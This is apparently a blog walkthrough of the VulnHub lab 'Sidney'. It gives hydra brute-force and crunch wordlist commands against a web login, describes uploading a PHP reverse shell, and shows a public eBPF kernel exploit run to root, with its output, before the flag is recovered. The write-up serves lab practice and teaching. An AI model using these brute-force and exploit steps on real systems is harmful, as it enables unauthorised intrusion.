30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Sidney: 0.2

7 years ago n0w4n

Location

https://www.vulnhub.com

Description

Welcome to my third boot2root / CTF this one is called Sidney. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag, and being me, it’s never where they normally live… B-)
If you are having trouble with the NIC, make sure the adapter is set to use the MAC 00:0C:29:50:14:56
Some hints for you:
If you are hitting a wall, read https://de.wikipedia.org/wiki/MOS_Technology_6502
The flag is audio as well as visual

Enumeration

nmap
Looks like port 80 is the only port that’s open. The page is filled with some text and a picture.
So…. Back for more are you….? Give Ben Daglish a call. I’m sure he’s know the login B-)
Commodore 64 Still ready
pic.JPG
Nothing in the source code. So let’s check the picture first with exiftool. But nothing there. There are a few things on the site that can be interpreted as a hint. Let’s start with ‘Ben Daglish’ first. He’s a songwriter with numerous songs on his belt. I made a wordlist with all his songs and run it through dirbuster. But to no avail.  Because a wordlist didn’t work, I used dirbuster in brute-force mode.
dirbuster
There is a /commodore64/ directory.
pic2
In the source code there is a comment:
<!– added by robhubbard password is the C=64 sound chip lowercase –>
<!– 3letters4digits no space… Instead, show user a proper micro –>
According to Wikipedia Ron Hubbard is a British composer best known for his composition of computer game theme music, especially for microcomputers of the 1980s such as the Commodore 64. Well isn’t this a coincidence. From the wiki page about Ron Hubbard, I was redirected to https://en.m.wikipedia.org/wiki/MOS_Technology_SID (just like the hint said).
With the newly found directory I used dirb to enumerate some more.
dirb
There are a lot of hits. First try is /index.php. This leads to the login page.
phpfm
In the previous comment there are a few hints that can offer a solution for logging in the system. It was said that the password was added by robhubbard. So this would probably be the username. As for the password, it is composed of the C=64 sound chip, lowercase 3letters4digits and no space. In the wiki page it was mentioned that the C64 sound chip (MOS technology – 3 letters) had several models named like ‘6581 R1’ (4 digits). So the password is probably something like mos6581 or something. Because there are 10^4 possibilities I used crunch to create a list.

crunch 7 7 -t mos%%%% -o passwords.txt

Now it’s time to use this list with hydra. For hydra to work I need some additional information.
form

hydra 192.168.56.2 -l robhubbard -P passwords.txt -v -t 10 -w 30 http-form-post “/commodore64/index.php:input_username=^USER^&input_password=^PASS^:Log in”

hydra
login
After viewing all options I decided to upload the php-reverse-shell from pentestmonkey and run it.
shell.JPG
And I’m in. Time to enumerate the system.

$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION=”Ubuntu 16.04 LTS”
NAME=”Ubuntu”
VERSION=”16.04 LTS (Xenial Xerus)”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 16.04 LTS”
VERSION_ID=”16.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”
UBUNTU_CODENAME=xenial
$ uname -a
Linux sidney 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Privilege Escalation

Checking exploit-db there is local root exploit (https://www.exploit-db.com/exploits/39772/). According to the description:
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, …), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
An exploit that puts all this together is in exploit.tar
After I downloaded the file I used the php file manager to upload this file.
exploit-upload

$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ cd ebpf_mapfd_doubleput_exploit
$ ls
compile.sh
doubleput.c
hello.c
suidhelper.c
$ ./compile.sh
$ ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you’ll have a root shell in <=60 seconds.
suid file detected, launching rootshell…
we have root privs now…
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Getting the Flag

cd /root
ls
hint.gif

A hint is always welcome.

cp hint.gif /var/www/html/commodore64/

After I copied the file, I used the file manager to download the file.
hint.JPG
Ok…..not really sure if this is helpful. Back to the remote system.

ls -aRl /root
/root:
total 84
drwx—— 3 root root 4096 May 25 18:40 .
drwxr-xr-x 23 root root 4096 May 31 20:39 ..
-rw-r–r– 1 root root 3106 Oct 22 2015 .bashrc
dr——– 3 root root 4096 May 24 21:02 .commodore64
-rw-r–r– 1 root root 148 Aug 17 2015 .profile
-rw-rw-r– 1 rhubbard rhubbard 62464 May 24 21:27 hint.gif
/root/.commodore64:
total 12
dr——– 3 root root 4096 May 24 21:02 .
drwx—— 3 root root 4096 May 25 18:40 ..
dr——– 3 root root 4096 May 24 21:01 .miami
/root/.commodore64/.miami:
total 12
dr——– 3 root root 4096 May 24 21:01 .
dr——– 3 root root 4096 May 24 21:02 ..
dr——– 2 root root 4096 May 25 18:40 vice
/root/.commodore64/.miami/vice:
total 12
dr——– 2 root root 4096 May 25 18:40 .
dr——– 3 root root 4096 May 24 21:01 ..
-r——– 1 rhubbard rhubbard 4089 May 24 20:59 flag.zip
-r——– 1 root root 0 May 24 21:02 versatile_commodore_emulator

Like the hint.gif file, I downloaded the flag.zip to my local system with the file manager.
flag
I tried to crack the zip with fcrackzip, but I noticed that the zip file didn’t made it through. Checking the permissions I noticed that the permission of flag.zip was 400 and the rest of the files was 644. After changing the permission of flag.zip the file was downloaded perfectly. Now for fcrackzip again.

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt flag.zip

fcrackzip

unzip flag.zip
Archive: flag.zip
[flag.zip] flag.d64 password:
inflating: flag.d64

A d64 extension. In the directory where flag.zip came from, there was also versatile_commodore_emulator. A quick Google search learns that this file could be a commodore 64 disk image and that Vice is the best solution for running that file.
After a few tries, Vice wasn’t really going to run properly and according to some forums it needs some work. Because this challenge has taken enough time, I finished this challenge the easy way. With strings.

strings flag.d64
SCREEN 1 –
“““““““““““““““““““
“““““““““““““““““
}CONGRATULATIONS! }
}
“““““““““““““““““
“““““““““““““““““““
TI
(60
0: G
TI
+r.81&4B7
\pbLh
%%%%%%%%%%%%%%%%%%%%%%%%)##
%%%%%%%%#)#
}
}WELL DONE ONCE MORE ON GETTING THE}
}FLAG –VULNHUB’S FIRST C=64 ONE– }
}WHICH I HOPE YOU ENJOYED. }
} }
}SHOUT-OUTS TO #VULNHUB & A S
} }
} }
}iuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiu}
}jkjkjkjkjkjkjkjkjkjkjkjkjkjkjkjkjk}
} }
PSID
Warhawk
Rob Hubbard
1986 Firebird
H)xJJJ
JJJJ
OP0
*,=GQ[oz
%%%%%%%%%%%%%%%%##)
%%%%%%
&&&&&&
”””
,,,,,
—–
…..
7?C?O
PECIAL}
}THANKS GOES TO GKNSB & RASTA
MOUSE}
}FOR TESTING & G0TMI1K FOR HOSTING.}
} }
}COMMODORE 64 – STILL READY }
} –KNIGHTMA
VULNHUB
01 2A
FLAG
WARHAWK.SID
qqqqqqqqqqqqqqqq
q q
qqqqqqqqqqqqqqqq

Fun challenge overall.